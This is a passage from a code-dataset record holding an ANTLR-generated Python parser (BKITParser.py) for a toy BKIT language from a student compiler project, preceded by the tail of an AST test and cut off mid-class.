EndFor. 
\n EndIf.\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,331))" }, { "alpha_fraction": 0.5057029724121094, "alphanum_fraction": 0.5516846179962158, "avg_line_length": 32.09162902832031, "blob_id": "8b079b87f5fa6d103813da5112c6b3f1f24437bd", "content_id": "52253e887361a479de6ac028c675b664485c8f56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41908, "license_type": "no_license", "max_line_length": 165, "num_lines": 1266, "path": "/SyntaxAnalysis/tut/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\36\")\n buf.write(\"\\u009d\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\3\\2\\3\\2\")\n buf.write(\"\\6\\2\\'\\n\\2\\r\\2\\16\\2(\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\7\\4\\67\\n\\4\\f\\4\\16\\4:\\13\\4\\3\\4\\5\\4=\\n\\4\")\n buf.write(\"\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\7\\5F\\n\\5\\f\\5\\16\\5I\\13\\5\\3\")\n buf.write(\"\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\5\\7Q\\n\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\b\\3\")\n buf.write(\"\\b\\3\\t\\3\\t\\3\\t\\7\\t\\\\\\n\\t\\f\\t\\16\\t_\\13\\t\\3\\t\\3\\t\\3\\n\\3\")\n buf.write(\"\\n\\3\\n\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\5\\13k\\n\\13\\3\\f\\3\\f\\3\\f\")\n buf.write(\"\\3\\f\\3\\f\\5\\fr\\n\\f\\3\\r\\3\\r\\3\\r\\3\\r\\3\\r\\5\\ry\\n\\r\\3\\16\\3\")\n 
buf.write(\"\\16\\3\\16\\3\\16\\3\\16\\5\\16\\u0080\\n\\16\\3\\17\\3\\17\\3\\17\\3\\17\")\n buf.write(\"\\3\\17\\3\\17\\7\\17\\u0088\\n\\17\\f\\17\\16\\17\\u008b\\13\\17\\3\\20\")\n buf.write(\"\\3\\20\\3\\20\\3\\20\\5\\20\\u0091\\n\\20\\3\\21\\3\\21\\3\\21\\7\\21\\u0096\")\n buf.write(\"\\n\\21\\f\\21\\16\\21\\u0099\\13\\21\\3\\22\\3\\22\\3\\22\\2\\3\\34\\23\")\n buf.write(\"\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\\36 \\\"\\2\\4\\3\\2\\n\\13\")\n buf.write(\"\\3\\2\\7\\b\\2\\u009d\\2&\\3\\2\\2\\2\\4,\\3\\2\\2\\2\\6\\60\\3\\2\\2\\2\\b\")\n buf.write(\"G\\3\\2\\2\\2\\nJ\\3\\2\\2\\2\\fP\\3\\2\\2\\2\\16T\\3\\2\\2\\2\\20X\\3\\2\\2\")\n buf.write(\"\\2\\22b\\3\\2\\2\\2\\24j\\3\\2\\2\\2\\26q\\3\\2\\2\\2\\30x\\3\\2\\2\\2\\32\")\n buf.write(\"\\177\\3\\2\\2\\2\\34\\u0081\\3\\2\\2\\2\\36\\u0090\\3\\2\\2\\2 \\u0092\")\n buf.write(\"\\3\\2\\2\\2\\\"\\u009a\\3\\2\\2\\2$\\'\\5\\4\\3\\2%\\'\\5\\6\\4\\2&$\\3\\2\\2\")\n buf.write(\"\\2&%\\3\\2\\2\\2\\'(\\3\\2\\2\\2(&\\3\\2\\2\\2()\\3\\2\\2\\2)*\\3\\2\\2\\2\")\n buf.write(\"*+\\7\\2\\2\\3+\\3\\3\\2\\2\\2,-\\5\\\"\\22\\2-.\\5 \\21\\2./\\7\\25\\2\\2\")\n buf.write(\"/\\5\\3\\2\\2\\2\\60\\61\\5\\\"\\22\\2\\61\\62\\7\\30\\2\\2\\62<\\7\\r\\2\\2\")\n buf.write(\"\\63\\64\\5\\n\\6\\2\\64\\65\\7\\25\\2\\2\\65\\67\\3\\2\\2\\2\\66\\63\\3\\2\")\n buf.write(\"\\2\\2\\67:\\3\\2\\2\\28\\66\\3\\2\\2\\289\\3\\2\\2\\29;\\3\\2\\2\\2:8\\3\\2\")\n buf.write(\"\\2\\2;=\\5\\n\\6\\2<8\\3\\2\\2\\2<=\\3\\2\\2\\2=>\\3\\2\\2\\2>?\\7\\16\\2\")\n buf.write(\"\\2?@\\7\\21\\2\\2@A\\5\\b\\5\\2AB\\7\\22\\2\\2B\\7\\3\\2\\2\\2CF\\5\\4\\3\")\n buf.write(\"\\2DF\\5\\f\\7\\2EC\\3\\2\\2\\2ED\\3\\2\\2\\2FI\\3\\2\\2\\2GE\\3\\2\\2\\2G\")\n buf.write(\"H\\3\\2\\2\\2H\\t\\3\\2\\2\\2IG\\3\\2\\2\\2JK\\5\\\"\\22\\2KL\\5 \\21\\2L\\13\")\n buf.write(\"\\3\\2\\2\\2MQ\\5\\16\\b\\2NQ\\5\\20\\t\\2OQ\\5\\22\\n\\2PM\\3\\2\\2\\2PN\")\n buf.write(\"\\3\\2\\2\\2PO\\3\\2\\2\\2QR\\3\\2\\2\\2RS\\7\\25\\2\\2S\\r\\3\\2\\2\\2TU\\7\")\n 
buf.write(\"\\30\\2\\2UV\\7\\27\\2\\2VW\\5\\24\\13\\2W\\17\\3\\2\\2\\2XY\\7\\30\\2\\2\")\n buf.write(\"Y]\\7\\r\\2\\2Z\\\\\\5 \\21\\2[Z\\3\\2\\2\\2\\\\_\\3\\2\\2\\2][\\3\\2\\2\\2]\")\n buf.write(\"^\\3\\2\\2\\2^`\\3\\2\\2\\2_]\\3\\2\\2\\2`a\\7\\16\\2\\2a\\21\\3\\2\\2\\2b\")\n buf.write(\"c\\7\\6\\2\\2cd\\5\\24\\13\\2d\\23\\3\\2\\2\\2ek\\5\\30\\r\\2fg\\7\\r\\2\\2\")\n buf.write(\"gh\\5\\26\\f\\2hi\\7\\16\\2\\2ik\\3\\2\\2\\2je\\3\\2\\2\\2jf\\3\\2\\2\\2k\")\n buf.write(\"\\25\\3\\2\\2\\2lr\\5\\24\\13\\2mn\\7\\r\\2\\2no\\5\\26\\f\\2op\\7\\16\\2\")\n buf.write(\"\\2pr\\3\\2\\2\\2ql\\3\\2\\2\\2qm\\3\\2\\2\\2r\\27\\3\\2\\2\\2st\\5\\32\\16\")\n buf.write(\"\\2tu\\7\\t\\2\\2uv\\5\\30\\r\\2vy\\3\\2\\2\\2wy\\5\\32\\16\\2xs\\3\\2\\2\")\n buf.write(\"\\2xw\\3\\2\\2\\2y\\31\\3\\2\\2\\2z{\\5\\34\\17\\2{|\\t\\2\\2\\2|}\\5\\32\")\n buf.write(\"\\16\\2}\\u0080\\3\\2\\2\\2~\\u0080\\5\\34\\17\\2\\177z\\3\\2\\2\\2\\177\")\n buf.write(\"~\\3\\2\\2\\2\\u0080\\33\\3\\2\\2\\2\\u0081\\u0082\\b\\17\\1\\2\\u0082\")\n buf.write(\"\\u0083\\5\\36\\20\\2\\u0083\\u0089\\3\\2\\2\\2\\u0084\\u0085\\f\\4\\2\")\n buf.write(\"\\2\\u0085\\u0086\\7\\f\\2\\2\\u0086\\u0088\\5\\34\\17\\5\\u0087\\u0084\")\n buf.write(\"\\3\\2\\2\\2\\u0088\\u008b\\3\\2\\2\\2\\u0089\\u0087\\3\\2\\2\\2\\u0089\")\n buf.write(\"\\u008a\\3\\2\\2\\2\\u008a\\35\\3\\2\\2\\2\\u008b\\u0089\\3\\2\\2\\2\\u008c\")\n buf.write(\"\\u0091\\7\\3\\2\\2\\u008d\\u0091\\7\\4\\2\\2\\u008e\\u0091\\7\\30\\2\")\n buf.write(\"\\2\\u008f\\u0091\\5\\20\\t\\2\\u0090\\u008c\\3\\2\\2\\2\\u0090\\u008d\")\n buf.write(\"\\3\\2\\2\\2\\u0090\\u008e\\3\\2\\2\\2\\u0090\\u008f\\3\\2\\2\\2\\u0091\")\n buf.write(\"\\37\\3\\2\\2\\2\\u0092\\u0097\\7\\30\\2\\2\\u0093\\u0094\\7\\26\\2\\2\")\n buf.write(\"\\u0094\\u0096\\7\\30\\2\\2\\u0095\\u0093\\3\\2\\2\\2\\u0096\\u0099\")\n buf.write(\"\\3\\2\\2\\2\\u0097\\u0095\\3\\2\\2\\2\\u0097\\u0098\\3\\2\\2\\2\\u0098\")\n buf.write(\"!\\3\\2\\2\\2\\u0099\\u0097\\3\\2\\2\\2\\u009a\\u009b\\t\\3\\2\\2\\u009b\")\n 
buf.write(\"#\\3\\2\\2\\2\\21&(8<EGP]jqx\\177\\u0089\\u0090\\u0097\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"'+'\", \"'-'\", \n \"'*'\", \"'/'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \n \"':'\", \"'.'\", \"';'\", \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\", \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \n \"STAR_INT\", \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_function_body = 3\n RULE_ids_list_with_type = 4\n RULE_stmt = 5\n RULE_assign_stmt = 6\n RULE_call_stmt = 7\n RULE_ret_stmt = 8\n RULE_expr = 9\n RULE_subexpr = 10\n RULE_expr0 = 11\n RULE_expr1 = 12\n RULE_expr2 = 13\n RULE_operand = 14\n RULE_ids_list = 15\n RULE_primitive_type = 16\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"function_body\", \n \"ids_list_with_type\", \"stmt\", \"assign_stmt\", \"call_stmt\", \n \"ret_stmt\", \"expr\", \"subexpr\", \"expr0\", \"expr1\", \"expr2\", \n \"operand\", \"ids_list\", \"primitive_type\" ]\n\n EOF = Token.EOF\n Integer_literal=1\n Float_literal=2\n String_literal=3\n RETURN=4\n INT=5\n FLOAT=6\n PLUS_INT=7\n MINUS_INT=8\n STAR_INT=9\n DIV_INT=10\n LEFT_PAREN=11\n RIGHT_PAREN=12\n LEFT_BRACKET=13\n RIGHT_BRACKET=14\n LEFT_BRACE=15\n 
RIGHT_BRACE=16\n COLON=17\n DOT=18\n SEMI=19\n COMMA=20\n ASSIGN=21\n ID=22\n ILLEGAL_ESCAPE=23\n UNCLOSE_STRING=24\n COMMENT=25\n UNTERMINATED_COMMENT=26\n ERROR_CHAR=27\n WS=28\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 36 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 36\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,0,self._ctx)\n if la_ == 1:\n self.state = 34\n self.var_declare()\n pass\n\n elif la_ == 2:\n self.state = 35\n self.function_declare()\n pass\n\n\n self.state = 38 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.INT 
or _la==BKITParser.FLOAT):\n break\n\n self.state = 40\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ids_list(self):\n return self.getTypedRuleContext(BKITParser.Ids_listContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare\" ):\n return visitor.visitVar_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 42\n self.primitive_type()\n self.state = 43\n self.ids_list()\n self.state = 44\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return 
self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def function_body(self):\n return self.getTypedRuleContext(BKITParser.Function_bodyContext,0)\n\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def ids_list_with_type(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_list_with_typeContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_list_with_typeContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_declare\" ):\n return visitor.visitFunction_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 46\n self.primitive_type()\n self.state = 47\n self.match(BKITParser.ID)\n self.state = 48\n self.match(BKITParser.LEFT_PAREN)\n self.state = 58\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.INT or _la==BKITParser.FLOAT:\n self.state = 54\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,2,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 49\n self.ids_list_with_type()\n self.state = 50\n self.match(BKITParser.SEMI) \n self.state = 56\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,2,self._ctx)\n\n self.state = 57\n self.ids_list_with_type()\n\n\n self.state = 60\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 61\n self.match(BKITParser.LEFT_BRACE)\n self.state = 62\n 
self.function_body()\n self.state = 63\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_bodyContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_body\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_body\" ):\n return visitor.visitFunction_body(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_body(self):\n\n localctx = BKITParser.Function_bodyContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_function_body)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 69\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.RETURN) | (1 << BKITParser.INT) | (1 << BKITParser.FLOAT) | (1 << BKITParser.ID))) != 0):\n self.state = 67\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT, BKITParser.FLOAT]:\n self.state = 65\n self.var_declare()\n pass\n elif token in [BKITParser.RETURN, BKITParser.ID]:\n self.state = 66\n self.stmt()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 71\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception 
= re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_list_with_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ids_list(self):\n return self.getTypedRuleContext(BKITParser.Ids_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list_with_type\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIds_list_with_type\" ):\n return visitor.visitIds_list_with_type(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def ids_list_with_type(self):\n\n localctx = BKITParser.Ids_list_with_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_ids_list_with_type)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 72\n self.primitive_type()\n self.state = 73\n self.ids_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def ret_stmt(self):\n return self.getTypedRuleContext(BKITParser.Ret_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt\" ):\n return visitor.visitStmt(self)\n 
else:\n return visitor.visitChildren(self)\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 78\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,6,self._ctx)\n if la_ == 1:\n self.state = 75\n self.assign_stmt()\n pass\n\n elif la_ == 2:\n self.state = 76\n self.call_stmt()\n pass\n\n elif la_ == 3:\n self.state = 77\n self.ret_stmt()\n pass\n\n\n self.state = 80\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitAssign_stmt\" ):\n return visitor.visitAssign_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 82\n self.match(BKITParser.ID)\n self.state = 83\n self.match(BKITParser.ASSIGN)\n self.state = 84\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def 
__init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def ids_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_listContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitCall_stmt\" ):\n return visitor.visitCall_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 86\n self.match(BKITParser.ID)\n self.state = 87\n self.match(BKITParser.LEFT_PAREN)\n self.state = 91\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ID:\n self.state = 88\n self.ids_list()\n self.state = 93\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 94\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ret_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ret_stmt\n\n def accept(self, 
visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitRet_stmt\" ):\n return visitor.visitRet_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def ret_stmt(self):\n\n localctx = BKITParser.Ret_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_ret_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 96\n self.match(BKITParser.RETURN)\n self.state = 97\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr0(self):\n return self.getTypedRuleContext(BKITParser.Expr0Context,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def subexpr(self):\n return self.getTypedRuleContext(BKITParser.SubexprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr\" ):\n return visitor.visitExpr(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_expr)\n try:\n self.state = 104\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.Integer_literal, BKITParser.Float_literal, BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 99\n self.expr0()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 100\n self.match(BKITParser.LEFT_PAREN)\n self.state = 101\n self.subexpr()\n self.state = 102\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise 
NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class SubexprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def subexpr(self):\n return self.getTypedRuleContext(BKITParser.SubexprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_subexpr\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitSubexpr\" ):\n return visitor.visitSubexpr(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def subexpr(self):\n\n localctx = BKITParser.SubexprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_subexpr)\n try:\n self.state = 111\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,9,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 106\n self.expr()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 107\n self.match(BKITParser.LEFT_PAREN)\n self.state = 108\n self.subexpr()\n self.state = 109\n self.match(BKITParser.RIGHT_PAREN)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr0Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self):\n return 
